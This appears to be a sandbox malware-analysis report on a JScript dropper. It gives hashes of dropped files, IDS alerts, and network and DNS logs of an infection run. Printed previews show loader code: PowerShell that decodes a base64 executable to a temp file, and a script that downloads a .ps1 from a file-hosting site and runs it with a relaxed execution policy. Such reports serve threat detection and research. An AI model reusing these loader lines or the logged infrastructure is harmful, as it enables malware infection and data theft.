                                                                                                      Category:dropped
                                                                                                      Size (bytes):226
                                                                                                      Entropy (8bit):5.360398796477698
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                      MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                      SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                      SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                      SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                      File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):186488
                                                                                                      Entropy (8bit):5.916802219473977
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:NlbgeXDOEpoKxKjtT0eIfGUQteCmpqLtSX9bun6CPh+G6K45I:/bg6BKdtTfIfGZ4rpGsNbuL+xa
                                                                                                      MD5:32DA6EE3B90B2D2F694B8635DFA58459
                                                                                                      SHA1:9272EE959D8290D6F4095FD6525C7927B5C92DE0
                                                                                                      SHA-256:00A6CD51B0D8CA285EEA43383A0736A9C4B95ED381FB5607291D08DC9870E30F
                                                                                                      SHA-512:BE827EEB5CB31C5126696577A54D52E26391EC843D36CBAB5C369C908ECA52115192DB73825C0FCEEFEABE5FE98B823545451CB7B6859998AF4325DA0CD1C173
                                                                                                      Malicious:false
                                                                                                      Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFALfgd6EAAAAAAAAAAOAAIgALATAAAH4AAACgAQAAAAAACmACAADAAQAAIAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAgAABAAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANTFAQBXAAAAAEACAJYFAAAAAAAAAAAAAAAAAAAAAAAAAIACAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAIACAAAAAAAAAAAAAAAAMABAEgAAAAAAAAAAAAAABw2RmQ6YyMRRJcBAAAgAAAAmAEAAAQAAAAAAAAAAAAAAAAAAEAAAOAudGV4dAAAAAx7AAAAwAEAAHwAAACcAQAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACWBQAAAEACAAAGAAAAGAIAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAEAAAAABgAgAAAgAAAB4CAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAgAIAAAIAAAAgAgAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                                                                      MD5:DA1F22117B9766A1F0220503765A5BA5
                                                                                                      SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                                                                      SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                                                                      SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                                                                      Malicious:false
                                                                                                      Preview:@...e.................................R..............@..........
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):139776
                                                                                                      Entropy (8bit):7.644817742072604
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:7tunZcvnVDr29cusZ67AJRDfmeTTlWhgnTf1qfUqnp07Kz7W:7tunZcvnVnB67UfmSimTfoMqnp07Kz
                                                                                                      MD5:9FB7455B1C6CB563FF7E58F422F3BC6E
                                                                                                      SHA1:B0EAAE8C4727FF2A6F0F288EA56D49E5B700C54A
                                                                                                      SHA-256:6E2D33CE0C4A7216F96AB98BCF2DBE18CDBF13A1C9BB011C52767A86858403B3
                                                                                                      SHA-512:702D9C99B0D63090531D77F3C6F251EA6D87179AC0616861EA70AB983B0101361C6DD90392B049AC8E4730B9626122380125C4740516C045CE21DB3743D05B18
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....w..........."...0..~...........`....... ....@.. ....................................`.....................................W....@...............................................................................`..................H............6Fd:c#.D.... ......................@....text....{.......|.................. ..`.rsrc........@......................@..@.............`...................... ..`.reloc............... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      File type:ASCII text, with CRLF line terminators
                                                                                                      Entropy (8bit):4.944630711745134
                                                                                                      TrID:
                                                                                                      • Digital Micrograph Script (4001/1) 100.00%
                                                                                                      File name:1C24TDP_000000029.jse
                                                                                                      File size:1'609 bytes
                                                                                                      MD5:ffb57c052a985d3e7b43502f4e07376c
                                                                                                      SHA1:fd80160aa4ab95c55fd0002b4705816c6c7fe1fd
                                                                                                      SHA256:2861bc7808cb4308c951499b8709ce15c8dd56e551183e5d75adf1a7b825fe07
                                                                                                      SHA512:4484980561782dfc6fda135fc0fb8d21fce22408502e8e03bd600bd3ec78e008a367ec443ee441f48d0eaf662e47b18c217586a15b315c653e12ac00c314d528
                                                                                                      SSDEEP:24:R3PsFtqKQkb+j6qk9UDPsZSWJpYjpMlUfu19cibuK5Ky9vbXcN0uK:R0Ftf6soWJpgu1zu6v7wA
                                                                                                      TLSH:6E318B1A591AE3391737A75B811BC258EBA2916B0A14C210F9CCC48CBF301BCCD75E8A
                                                                                                      File Content Preview:// Constants to avoid magic strings..var _a = "https://files.catbox.moe/jqxrkk.ps1";..var _b = "C:\\Temp\\dddddd.ps1";..var _c = "C:\\Temp";..var _d = 200;....// PowerShell execution policy and command..var _e = "PowerShell -NoProfile -ExecutionPolicy Rem
                                                                                                      Icon Hash:68d69b8bb6aa9a86
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2025-01-09T18:33:11.356574+01002827578ETPRO MALWARE Likely Dropper Doc GET to .moe TLD1192.168.2.449730108.181.20.35443TCP
                                                                                                      2025-01-09T18:33:11.533811+01002018856ET MALWARE Windows executable base64 encoded1108.181.20.35443192.168.2.449730TCP
                                                                                                      2025-01-09T18:33:19.821960+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731132.226.247.7380TCP
                                                                                                      2025-01-09T18:33:26.440288+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731132.226.247.7380TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 9, 2025 18:33:10.283637047 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:10.283706903 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:10.283787966 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:10.297008991 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:10.297033072 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.133873940 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.133946896 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.177464008 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.177503109 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.177829981 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.177898884 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.179719925 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.227330923 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.356633902 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.356666088 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.356702089 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.356915951 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.356915951 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.356955051 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.357004881 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.443341970 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.443377972 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.443432093 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.443461895 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.443486929 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.443511963 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.485450029 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.485490084 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.485538960 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.485555887 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.485579967 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.485600948 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.533849955 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.533878088 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.533937931 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.533967018 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.533993959 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.534001112 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.534854889 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.534873009 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.534904957 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.534910917 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.534948111 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.536286116 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.536302090 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.536346912 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.536354065 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.536386013 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.623708010 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.623760939 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.623816013 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.623848915 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.623867035 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.623917103 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.624218941 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.624238968 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.624303102 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.624315023 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.624373913 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.625238895 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.625252008 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.625298023 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.625305891 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.625335932 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.625368118 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.626116991 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.626132011 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.626173973 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.626182079 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.626218081 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.626934052 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.626949072 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.627005100 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.627007961 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.627017021 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.627057076 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.627068996 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.627073050 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.627105951 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:11.627132893 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.627161026 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.627794027 CET49730443192.168.2.4108.181.20.35
                                                                                                      Jan 9, 2025 18:33:11.627810955 CET44349730108.181.20.35192.168.2.4
                                                                                                      Jan 9, 2025 18:33:18.866297960 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:33:18.871141911 CET8049731132.226.247.73192.168.2.4
                                                                                                      Jan 9, 2025 18:33:18.871334076 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:33:18.871431112 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:33:18.876188040 CET8049731132.226.247.73192.168.2.4
                                                                                                      Jan 9, 2025 18:33:19.559628010 CET8049731132.226.247.73192.168.2.4
                                                                                                      Jan 9, 2025 18:33:19.563570976 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:33:19.568381071 CET8049731132.226.247.73192.168.2.4
                                                                                                      Jan 9, 2025 18:33:19.775367975 CET8049731132.226.247.73192.168.2.4
                                                                                                      Jan 9, 2025 18:33:19.799343109 CET49732443192.168.2.4104.21.96.1
                                                                                                      Jan 9, 2025 18:33:19.799387932 CET44349732104.21.96.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:19.799504042 CET49732443192.168.2.4104.21.96.1
                                                                                                      Jan 9, 2025 18:33:19.809120893 CET49732443192.168.2.4104.21.96.1
                                                                                                      Jan 9, 2025 18:33:19.809160948 CET44349732104.21.96.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:19.821959972 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:33:20.347222090 CET44349732104.21.96.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:20.347342968 CET49732443192.168.2.4104.21.96.1
                                                                                                      Jan 9, 2025 18:33:20.396645069 CET49732443192.168.2.4104.21.96.1
                                                                                                      Jan 9, 2025 18:33:20.396670103 CET44349732104.21.96.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:20.397109032 CET44349732104.21.96.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:20.447334051 CET49732443192.168.2.4104.21.96.1
                                                                                                      Jan 9, 2025 18:33:20.546648979 CET49732443192.168.2.4104.21.96.1
                                                                                                      Jan 9, 2025 18:33:20.587337017 CET44349732104.21.96.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:20.794265985 CET44349732104.21.96.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:20.794332027 CET44349732104.21.96.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:20.794420004 CET49732443192.168.2.4104.21.96.1
                                                                                                      Jan 9, 2025 18:33:20.830086946 CET49732443192.168.2.4104.21.96.1
                                                                                                      Jan 9, 2025 18:33:26.167696953 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:33:26.172496080 CET8049731132.226.247.73192.168.2.4
                                                                                                      Jan 9, 2025 18:33:26.380079985 CET8049731132.226.247.73192.168.2.4
                                                                                                      Jan 9, 2025 18:33:26.440288067 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:33:27.135301113 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:27.140080929 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:27.141845942 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:28.874438047 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:28.874634981 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:28.879435062 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:29.441633940 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:29.441786051 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:29.446611881 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:29.789529085 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:29.790056944 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:29.794807911 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.145617962 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.145627975 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.145693064 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:30.145888090 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.145987988 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.146032095 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:30.146183014 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.146239996 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.146284103 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:30.235999107 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.253505945 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:30.258430958 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.653846979 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:30.660727978 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:30.665494919 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:31.059159994 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:31.060363054 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:31.065166950 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:31.408709049 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:31.409044027 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:31.413813114 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:32.120556116 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:32.120804071 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:32.127088070 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:32.545300007 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:32.545598030 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:32.550415993 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:32.908843994 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:32.909173965 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:32.914009094 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:33.294158936 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:33.295015097 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:33.295015097 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:33.295015097 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:33.295015097 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:33:33.299941063 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:33.299952984 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:33.300075054 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:33.300084114 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:35.325654984 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:35.369226933 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:34:16.400517941 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:34:16.405443907 CET8049731132.226.247.73192.168.2.4
                                                                                                      Jan 9, 2025 18:34:16.405509949 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:35:06.417788029 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:35:06.422734022 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:35:07.917037010 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:35:07.917216063 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:35:07.917269945 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:35:07.917401075 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:35:07.917401075 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:35:07.917999029 CET49736587192.168.2.4123.30.244.30
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 9, 2025 18:33:10.269741058 CET5719953192.168.2.41.1.1.1
                                                                                                      Jan 9, 2025 18:33:10.278704882 CET53571991.1.1.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:18.852330923 CET5993053192.168.2.41.1.1.1
                                                                                                      Jan 9, 2025 18:33:18.859540939 CET53599301.1.1.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:19.789216995 CET6435953192.168.2.41.1.1.1
                                                                                                      Jan 9, 2025 18:33:19.797038078 CET53643591.1.1.1192.168.2.4
                                                                                                      Jan 9, 2025 18:33:26.392050028 CET5694653192.168.2.41.1.1.1
                                                                                                      Jan 9, 2025 18:33:27.130851030 CET53569461.1.1.1192.168.2.4
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Jan 9, 2025 18:33:10.269741058 CET192.168.2.41.1.1.10xe37bStandard query (0)files.catbox.moeA (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:18.852330923 CET192.168.2.41.1.1.10xb41dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:19.789216995 CET192.168.2.41.1.1.10x5eaStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:26.392050028 CET192.168.2.41.1.1.10x9848Standard query (0)mail.phobinh.com.vnA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Jan 9, 2025 18:33:10.278704882 CET1.1.1.1192.168.2.40xe37bNo error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:18.859540939 CET1.1.1.1192.168.2.40xb41dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:18.859540939 CET1.1.1.1192.168.2.40xb41dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:18.859540939 CET1.1.1.1192.168.2.40xb41dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:18.859540939 CET1.1.1.1192.168.2.40xb41dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:18.859540939 CET1.1.1.1192.168.2.40xb41dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:18.859540939 CET1.1.1.1192.168.2.40xb41dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:19.797038078 CET1.1.1.1192.168.2.40x5eaNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
